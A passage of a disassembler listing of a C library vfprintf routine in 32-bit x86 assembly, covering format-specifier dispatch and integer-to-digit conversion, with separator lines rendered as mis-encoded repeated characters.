陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051824: ; CODE XREF: vfprintf+1E4Fj ; DATA XREF: vfprintf+1E58o mov dword ptr [esi+44h], 3 ; case 0x70 jmp short loc_8051843 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051830: ; CODE XREF: vfprintf+1E4Fj ; DATA XREF: vfprintf+1E58o mov dword ptr [esi+44h], 800h ; case 0x6e jmp short loc_8051843 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805183C: ; CODE XREF: vfprintf+1E49j ; vfprintf+1E4Fj ; DATA XREF: ... mov dword ptr [esi+48h], 0 ; default loc_8051843: ; CODE XREF: vfprintf+1E33j ; vfprintf+1F35j ... 
cmp dword ptr [esi+40h], 0FFFFFFFFh jnz short loc_8051861 cmp dword ptr [esi+48h], 0 jz short loc_8051861 mov ebx, [ebp+var_4B8] mov [esi+40h], ebx mov edi, [esi+48h] add [ebp+var_4BC], edi loc_8051861: ; CODE XREF: vfprintf+1FBFj ; vfprintf+1FC5j cmp byte ptr [esi+8], 0 jnz short loc_8051878 mov edx, [ebp+var_450] dec edx mov [esi+34h], edx mov [esi+30h], edx jmp short loc_80518D2 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051878: ; CODE XREF: vfprintf+1FDDj mov edx, [ebp+var_450] mov [esi+30h], edx mov [ebp+var_4F0], edx cmp byte ptr [edx], 0 jz short loc_80518C9 loc_805188C: ; CODE XREF: vfprintf+203Fj mov ecx, [ebp+var_4F0] cmp byte ptr [ecx], 25h jz short loc_80518C9 cmp byte ptr [ecx], 0 jge short loc_80518AD push 1 push ecx push 0 call sub_805602C add esp, 0Ch test eax, eax jg short loc_80518B8 loc_80518AD: ; CODE XREF: vfprintf+2012j inc [ebp+var_4F0] jmp short loc_80518BE ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80518B8: ; CODE XREF: vfprintf+2023j add [ebp+var_4F0], eax loc_80518BE: ; CODE XREF: vfprintf+202Bj mov ebx, [ebp+var_4F0] cmp byte ptr [ebx], 0 jnz short loc_805188C loc_80518C9: ; CODE XREF: vfprintf+2002j ; vfprintf+200Dj mov edi, [ebp+var_4F0] mov [esi+34h], edi loc_80518D2: ; CODE XREF: vfprintf+1FECj mov ecx, [ebp+var_4BC] add [ebp+var_4B0], ecx mov ebx, [ebp+var_4D4] mov edi, [ebp+var_4AC] mov edx, [edi+ebx+34h] mov [ebp+var_400], edx add ebx, 58h mov [ebp+var_4D4], ebx inc [ebp+var_4A4] cmp byte ptr [edx], 0 jnz loc_8050F64 loc_805190C: ; CODE XREF: vfprintf+16BFj mov edx, [ebp+var_43C] mov eax, [ebp+var_4B0] cmp eax, edx jnb short loc_805191E mov eax, edx loc_805191E: ; CODE XREF: vfprintf+2092j mov [ebp+var_4B0], eax lea edx, ds:0[eax*4] mov [ebp+var_4E0], edx sub esp, edx mov esi, esp push edx push 0 push esi call memset mov ecx, [ebp+var_4B0] lea edx, [ecx+ecx*2] shl edx, 2 add esp, 0Ch sub esp, edx mov [ebp+var_4B4], esp cmp 
[ebp+var_4A4], 0 jz loc_8051A54 mov ebx, [ebp+var_4AC] mov [ebp+var_4F0], ebx mov [ebp+var_4EC], 0 loc_8051978: ; CODE XREF: vfprintf+21C6j mov edi, [ebp+var_4EC] mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi+3Ch], 0FFFFFFFFh jz short loc_8051996 mov edx, [ecx+edi+3Ch] mov dword ptr [esi+edx*4], 0 loc_8051996: ; CODE XREF: vfprintf+2101j mov ebx, [ebp+var_4EC] mov edi, [ebp+var_4AC] cmp dword ptr [edi+ebx+38h], 0FFFFFFFFh jz short loc_80519B4 mov edx, [edi+ebx+38h] mov dword ptr [esi+edx*4], 0 loc_80519B4: ; CODE XREF: vfprintf+211Fj mov ecx, [ebp+var_4EC] mov ebx, [ebp+var_4AC] mov edx, [ebx+ecx+48h] test edx, edx jz short loc_8051A2B cmp edx, 1 jnz short loc_80519DC mov edi, [ebx+ecx+40h] mov edx, [ebx+ecx+44h] mov [esi+edi*4], edx jmp short loc_8051A2B ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80519DC: ; CODE XREF: vfprintf+2143j mov ecx, [ebp+var_4EC] mov ebx, [ebp+var_4AC] movzx ecx, byte ptr [ebx+ecx+8] mov [ebp+var_4E0], ecx mov edi, [ebp+var_4EC] mov edi, [ebx+edi+40h] lea edx, ds:0[edi*4] add edx, esi push edx mov ecx, [ebp+var_4EC] mov edx, [ebx+ecx+48h] push edx mov ebx, [ebp+var_4F0] push ebx mov edi, [ebp+var_4E0] mov edx, ds:dword_807E78C[edi*4] call edx add esp, 0Ch loc_8051A2B: ; CODE XREF: vfprintf+213Ej ; vfprintf+2150j add [ebp+var_4F0], 58h add [ebp+var_4EC], 58h mov ecx, [ebp+var_4A4] lea edx, [ecx+ecx*4] lea edx, [ecx+edx*2] shl edx, 3 cmp [ebp+var_4EC], edx jnz loc_8051978 loc_8051A54: ; CODE XREF: vfprintf+20D4j mov [ebp+var_4F0], 0 mov ebx, [ebp+var_468] mov [ebp+arg_8], ebx mov edi, [ebp+var_4B0] cmp [ebp+var_4F0], edi jnb loc_8051BDE mov eax, [ebp+var_4B4] nop loc_8051A80: ; CODE XREF: vfprintf+2350j mov edx, [esi] cmp edx, 4 jz loc_8051B38 jg short loc_8051ABC cmp edx, 1 jz short loc_8051AF8 jg short loc_8051AA4 test edx, edx jz loc_8051B78 jmp loc_8051B98 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051AA4: ; CODE XREF: 
vfprintf+220Aj cmp edx, 2 jz loc_8051B78 cmp edx, 3 jz loc_8051B88 jmp loc_8051B98 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8051ABC: ; CODE XREF: vfprintf+2203j cmp edx, 105h jz loc_8051B5C jg short loc_8051ADC cmp edx, 5 jz short loc_8051B48 cmp edx, 100h jz short loc_8051B20 jmp loc_8051B98 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051ADC: ; CODE XREF: vfprintf+2240j cmp edx, 200h jz loc_8051B88 cmp edx, 400h jz short loc_8051B0C jmp loc_8051B98 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051AF8: ; CODE XREF: vfprintf+2208j add [ebp+arg_8], 4 mov ecx, [ebp+arg_8] mov dl, [ecx-4] mov [eax], dl jmp loc_8051BC0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051B0C: ; CODE XREF: vfprintf+2266j add [ebp+arg_8], 4 mov ebx, [ebp+arg_8] mov dx, [ebx-4] mov [eax], dx jmp loc_8051BC0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8051B20: ; CODE XREF: vfprintf+224Dj add [ebp+arg_8], 8 mov ebx, [ebp+arg_8] mov edx, [ebx-8] mov [eax], edx mov edx, [ebx-4] mov [eax+4], edx jmp loc_8051BC0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8051B38: ; CODE XREF: vfprintf+21FDj add [ebp+arg_8], 8 mov edi, [ebp+arg_8] fld qword ptr [edi-8] fstp dword ptr [eax] jmp short loc_8051BC0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051B48: ; CODE XREF: vfprintf+2245j add [ebp+arg_8], 8 mov ecx, [ebp+arg_8] mov edx, [ecx-8] mov [eax], edx mov edx, [ecx-4] mov [eax+4], edx jmp short loc_8051BC0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051B5C: ; CODE XREF: vfprintf+223Aj add [ebp+arg_8], 0Ch mov ebx, [ebp+arg_8] mov edx, [ebx-0Ch] mov [eax], edx mov edx, [ebx-8] mov [eax+4], edx mov edx, [ebx-4] mov [eax+8], edx jmp short loc_8051BC0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051B78: ; CODE XREF: vfprintf+220Ej ; vfprintf+221Fj add [ebp+arg_8], 4 mov 
edi, [ebp+arg_8] mov edx, [edi-4] mov [eax], edx jmp short loc_8051BC0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051B88: ; CODE XREF: vfprintf+2228j ; vfprintf+225Aj add [ebp+arg_8], 4 mov ecx, [ebp+arg_8] mov edx, [ecx-4] mov [eax], edx jmp short loc_8051BC0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051B98: ; CODE XREF: vfprintf+2214j ; vfprintf+222Ej ... test byte ptr [esi+1], 8 jz short loc_8051BAC add [ebp+arg_8], 4 mov ebx, [ebp+arg_8] mov edx, [ebx-4] mov [eax], edx jmp short loc_8051BC0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051BAC: ; CODE XREF: vfprintf+2314j mov dword ptr [eax], 0 mov dword ptr [eax+4], 0 mov dword ptr [eax+8], 0 loc_8051BC0: ; CODE XREF: vfprintf+227Cj ; vfprintf+2292j ... add eax, 0Ch add esi, 4 inc [ebp+var_4F0] mov edi, [ebp+var_4B0] cmp [ebp+var_4F0], edi jb loc_8051A80 loc_8051BDE: ; CODE XREF: vfprintf+21EBj mov ecx, [ebp+var_4A4] cmp [ebp+var_460], ecx jnb loc_80529B8 mov ebx, [ebp+var_460] lea edx, [ebx+ebx*4] lea edx, [ebx+edx*2] shl edx, 3 mov [ebp+var_4D0], edx db 8Dh,76h,0 ; lea esi, [esi+0] loc_8051C08: ; CODE XREF: vfprintf+312Aj mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi+3Ch], 0FFFFFFFFh jz short loc_8051C41 mov edx, [ecx+edi+3Ch] lea edx, [edx+edx*2] mov ebx, [ebp+var_4B4] mov edx, [ebx+edx*4] mov [ecx+edi+4], edx test edx, edx jge short loc_8051C41 neg edx mov [ecx+edi+4], edx mov dword ptr [ecx+edi+20h], 1 loc_8051C41: ; CODE XREF: vfprintf+2391j ; vfprintf+23A9j mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi+38h], 0FFFFFFFFh jz short loc_8051C72 mov edx, [ecx+edi+38h] lea edx, [edx+edx*2] mov ebx, [ebp+var_4B4] mov edx, [ebx+edx*4] mov [ecx+edi], edx test edx, edx jge short loc_8051C72 mov dword ptr [ecx+edi], 0FFFFFFFFh loc_8051C72: ; CODE XREF: vfprintf+23CAj ; vfprintf+23E1j mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] movzx edx, byte ptr [ecx+edi+8] add 
edx, 0FFFFFFDBh ; switch 84 cases cmp edx, 53h ja loc_805287C ; default jmp ds:off_8051C98[edx*4] ; switch jump ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h off_8051C98 dd offset loc_8051DE8, 1Fh dup(offset loc_805287C), offset loc_8052480 ; DATA XREF: vfprintf+2407r dd offset loc_805287C, offset loc_8052480, 10h dup(offset loc_805287C) ; jump table for switch statement dd offset loc_8051F58, 0Ah dup(offset loc_805287C), offset loc_805248C dd offset loc_8051E24, 3 dup(offset loc_8052480), offset loc_805287C dd offset loc_8051E24, 3 dup(offset loc_805287C), offset loc_8052858 dd offset loc_8052794, offset loc_8051F4C, offset loc_8052718 dd 2 dup(offset loc_805287C), offset loc_8052560, offset loc_805287C dd offset loc_8051F40, 2 dup(offset loc_805287C), offset loc_8051F58 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051DE8: ; CODE XREF: vfprintf+2407j ; DATA XREF: vfprintf+2410o mov ebx, [ebp+arg_0] ; case 0x25 mov edx, [ebx+14h] cmp [ebx+18h], edx ja short loc_8051E0C push 25h push ebx call sub_8061910 add esp, 8 cmp eax, 0FFFFFFFFh jz loc_8050E72 ; case 0x0 jmp short loc_8051E18 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051E0C: ; CODE XREF: vfprintf+2569j mov edi, [ebp+arg_0] mov edx, [edi+14h] mov byte ptr [edx], 25h inc dword ptr [edi+14h] loc_8051E18: ; CODE XREF: vfprintf+257Fj inc [ebp+var_464] jmp loc_8052933 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8051E24: ; CODE XREF: vfprintf+2407j ; DATA XREF: vfprintf+2410o mov [ebp+var_4F0], 0Ah ; case 0x64 mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] cmp dword ptr [ebx+ecx+0Ch], 0 jz loc_8051ED0 mov edx, [ebx+ecx+40h] lea edx, [edx+edx*2] mov edi, [ebp+var_4B4] mov ecx, [edi+edx*4] mov [ebp+var_4EC], ecx mov ecx, [edi+edx*4+4] mov [ebp+var_4E8], ecx mov [ebp+var_4CC], 0 cmp [ebp+var_4E8], 0 jge short loc_8051E7E inc [ebp+var_4CC] loc_8051E7E: ; CODE XREF: vfprintf+25EEj mov ebx, [ebp+var_4EC] mov [ebp+var_4EC], ebx mov ebx, [ebp+var_4E8] mov 
[ebp+var_4E8], ebx cmp [ebp+var_4CC], 0 jz short loc_8051EB2 neg [ebp+var_4EC] adc [ebp+var_4E8], 0 neg [ebp+var_4E8] loc_8051EB2: ; CODE XREF: vfprintf+2615j mov edi, [ebp+var_4EC] mov [ebp+var_4C8], edi mov edi, [ebp+var_4E8] mov [ebp+var_4C4], edi jmp loc_8051FB3 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8051ED0: ; CODE XREF: vfprintf+25B7j mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] cmp dword ptr [ebx+ecx+14h], 0 jnz short loc_8051EF6 mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] cmp dword ptr [ebx+ecx+10h], 0 jnz short loc_8051F08 loc_8051EF6: ; CODE XREF: vfprintf+2659j mov edx, [ebx+ecx+40h] lea edx, [edx+edx*2] mov edi, [ebp+var_4B4] mov edx, [edi+edx*4] jmp short loc_8051F25 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051F08: ; CODE XREF: vfprintf+266Cj mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] mov edx, [ebx+ecx+40h] lea edx, [edx+edx*2] mov edi, [ebp+var_4B4] movsx edx, word ptr [edi+edx*4] loc_8051F25: ; CODE XREF: vfprintf+267Ej mov ecx, edx shr ecx, 1Fh mov [ebp+var_4CC], ecx jz loc_80520F5 neg edx jmp loc_80520F5 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051F40: ; CODE XREF: vfprintf+2407j ; DATA XREF: vfprintf+2410o mov [ebp+var_4F0], 0Ah ; case 0x75 jmp short loc_8051F62 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051F4C: ; CODE XREF: vfprintf+2407j ; DATA XREF: vfprintf+2410o mov [ebp+var_4F0], 8 ; case 0x6f jmp short loc_8051F62 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051F58: ; CODE XREF: vfprintf+2407j ; DATA XREF: vfprintf+2410o mov [ebp+var_4F0], 10h ; case 0x58 loc_8051F62: ; CODE XREF: vfprintf+26C2j ; vfprintf+26CEj mov [ebp+var_4CC], 0 mov ebx, [ebp+var_4D0] mov edi, [ebp+var_4AC] mov dword ptr [edi+ebx+24h], 0 mov dword ptr [edi+ebx+1Ch], 0 cmp dword ptr [edi+ebx+0Ch], 0 jz loc_80520A0 mov edx, [edi+ebx+40h] lea edx, [edx+edx*2] mov ecx, [ebp+var_4B4] mov ebx, [ecx+edx*4] mov [ebp+var_4C8], ebx mov ebx, [ecx+edx*4+4] mov [ebp+var_4C4], ebx loc_8051FB3: ; CODE 
XREF: vfprintf+2642j mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi], 0 jge short loc_8051FD0 mov dword ptr [ecx+edi], 1 jmp short loc_8051FE1 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051FD0: ; CODE XREF: vfprintf+273Bj mov ebx, [ebp+var_4D0] mov edi, [ebp+var_4AC] mov byte ptr [edi+ebx+2Ch], 20h loc_8051FE1: ; CODE XREF: vfprintf+2744j mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] cmp dword ptr [ebx+ecx], 0 jnz short loc_805200C cmp [ebp+var_4C8], 0 jnz short loc_805200C cmp [ebp+var_4C4], 0 jnz short loc_805200C lea esi, [ebp+var_1] jmp short loc_8052079 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805200C: ; CODE XREF: vfprintf+2769j ; vfprintf+2772j ... mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp byte ptr [ecx+edi+8], 58h setz dl and edx, 0FFh push edx mov ebx, [ebp+var_4F0] push ebx push ebp push [ebp+var_4C4] push [ebp+var_4C8] call sub_8062714 mov esi, eax dec esi add esp, 14h mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi+28h], 0 jz short loc_8052079 cmp [ebp+var_458], 0 jz short loc_8052079 mov edx, [ebp+var_3F8] push edx mov ebx, [ebp+var_458] push ebx lea edx, [ebp+var_1] push edx push esi call sub_8052C9C mov esi, eax add esp, 10h loc_8052079: ; CODE XREF: vfprintf+2780j ; vfprintf+27C9j ... 
xor edx, edx cmp [ebp+var_4C8], 0 jnz short loc_805208D cmp [ebp+var_4C4], 0 jz short loc_8052092 loc_805208D: ; CODE XREF: vfprintf+27FAj mov edx, 1 loc_8052092: ; CODE XREF: vfprintf+2803j mov [ebp+var_4C8], edx jmp loc_8052242 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80520A0: ; CODE XREF: vfprintf+2705j mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi+14h], 0 jnz short loc_80520C6 mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi+10h], 0 jnz short loc_80520D8 loc_80520C6: ; CODE XREF: vfprintf+2829j mov edx, [ecx+edi+40h] lea edx, [edx+edx*2] mov ebx, [ebp+var_4B4] mov edx, [ebx+edx*4] jmp short loc_80520F5 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80520D8: ; CODE XREF: vfprintf+283Cj mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] mov edx, [ecx+edi+40h] lea edx, [edx+edx*2] mov ebx, [ebp+var_4B4] movzx edx, word ptr [ebx+edx*4] loc_80520F5: ; CODE XREF: vfprintf+26A8j ; vfprintf+26B0j ... 
mov [ebp+var_4C8], edx loc_80520FB: ; CODE XREF: vfprintf+2EDFj mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp dword ptr [ecx+edi], 0 jge short loc_8052118 mov dword ptr [ecx+edi], 1 jmp short loc_8052129 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052118: ; CODE XREF: vfprintf+2883j mov ebx, [ebp+var_4D0] mov edi, [ebp+var_4AC] mov byte ptr [edi+ebx+2Ch], 20h loc_8052129: ; CODE XREF: vfprintf+288Cj mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] cmp dword ptr [ebx+ecx], 0 jnz short loc_805214C cmp [ebp+var_4C8], 0 jnz short loc_805214C lea esi, [ebp+var_1] jmp loc_8052242 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805214C: ; CODE XREF: vfprintf+28B1j ; vfprintf+28BAj mov edx, [ebp+var_4C8] mov eax, edx mov edx, ebp mov [ebp+var_4EC], offset a0123456789abcd ; "0123456789abcdefghijklmnopqrstuvwxyz" mov edi, [ebp+var_4D0] mov ecx, [ebp+var_4AC] cmp byte ptr [ecx+edi+8], 58h jnz short loc_805217D mov [ebp+var_4EC], offset a0123456789ab_0 ; "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" loc_805217D: ; CODE XREF: vfprintf+28E9j mov esi, edx cmp [ebp+var_4F0], 0Ah jz short loc_80521A4 ja short loc_8052198 cmp [ebp+var_4F0], 8 jz short loc_80521D8 jmp short loc_80521F0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052198: ; CODE XREF: vfprintf+2900j cmp [ebp+var_4F0], 10h jz short loc_80521C0 jmp short loc_80521F0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80521A4: ; CODE XREF: vfprintf+28FEj ; vfprintf+2933j dec esi mov ebx, 0Ah xor edx, edx div ebx mov edi, [ebp+var_4EC] mov dl, [edx+edi] mov [esi], dl test eax, eax jnz short loc_80521A4 jmp short loc_8052208 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80521C0: ; CODE XREF: vfprintf+2917j ; vfprintf+294Cj dec esi mov edx, eax and edx, 0Fh mov ecx, [ebp+var_4EC] mov dl, [edx+ecx] mov [esi], dl shr eax, 4 jnz short loc_80521C0 jmp short loc_8052208 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80521D8: ; 
CODE XREF: vfprintf+2909j ; vfprintf+2964j dec esi mov edx, eax and edx, 7 mov ebx, [ebp+var_4EC] mov dl, [edx+ebx] mov [esi], dl shr eax, 3 jnz short loc_80521D8 jmp short loc_8052208 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80521F0: ; CODE XREF: vfprintf+290Bj ; vfprintf+2919j ... dec esi xor edx, edx div [ebp+var_4F0] mov edi, [ebp+var_4EC] mov dl, [edx+edi] mov [esi], dl test eax, eax jnz short loc_80521F0 loc_8052208: ; CODE XREF: vfprintf+2935j ; vfprintf+294Ej ... dec esi mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] cmp dword ptr [ebx+ecx+28h], 0 jz short loc_8052242 cmp [ebp+var_458], 0 jz short loc_8052242 mov edx, [ebp+var_3F8] push edx mov edi, [ebp+var_458] push edi lea edx, [ebp+var_1] push edx push esi call sub_8052C9C mov esi, eax add esp, 10h loc_8052242: ; CODE XREF: vfprintf+2810j ; vfprintf+28BFj ... mov edx, esi not edx add edx, ebp mov ecx, [ebp+var_4D0] mov ebx, [ebp+var_4AC] sub [ebx+ecx+4], edx mov edi, [ebx+ecx] sub edi, edx mov edx, edi mov [ebx+ecx], edx cmp [ebp+var_4C8], 0 jz short loc_8052287 cmp dword ptr [ebx+ecx+18h], 0 jz short loc_8052287 cmp [ebp+var_4F0], 8 jnz short loc_8052287 test edx, edx jg short loc_8052287 mov byte ptr [esi], 30h dec esi dec dword ptr [ebx+ecx+4] 